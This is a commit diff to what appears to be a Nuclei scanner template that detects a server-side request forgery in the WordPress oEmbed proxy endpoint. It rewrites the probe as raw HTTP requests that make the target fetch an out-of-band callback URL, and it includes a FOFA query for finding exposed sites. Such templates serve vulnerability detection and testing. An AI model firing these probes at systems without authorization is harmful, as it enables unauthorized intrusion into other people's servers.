Update wordpress-ssrf-oembed.yaml

http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml

@@ -1,29 +1,35 @@
 id: wordpress-ssrf-oembed
 
 info:
-  name: Wordpress Oembed Proxy SSRF
+  name: Wordpress Oembed Proxy - Server-side request forgery
   author: dhiyaneshDk
   severity: medium
   reference:
     - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress
     - https://github.com/incogbyte/quickpress/blob/master/core/req.go
-  tags: wordpress,ssrf,oast,proxy
   metadata:
-    fofa-query: body="oembed" && body="wp-"
     max-request: 1
+    fofa-query: body="oembed" && body="wp-"
+  tags: wordpress,ssrf,oast,oembed
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-json/oembed/1.0/proxy"
-      - "{{BaseURL}}/wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}}/"
+  - raw:
+      - |
+        GET /wp-json/oembed/1.0/proxy HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}} HTTP/1.1
+        Host: {{Hostname}}
 
     matchers-condition: and
     matchers:
-      - type: dsl
-        dsl:
-          - 'contains(to_lower(response_1), "rest_missing_callback_param")'
+      - type: word
+        part: body_1
+        words:
+          - 'rest_missing_callback_param'
 
-      - type: dsl
-        dsl:
-          - 'contains(interactsh_protocol, "http")'
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"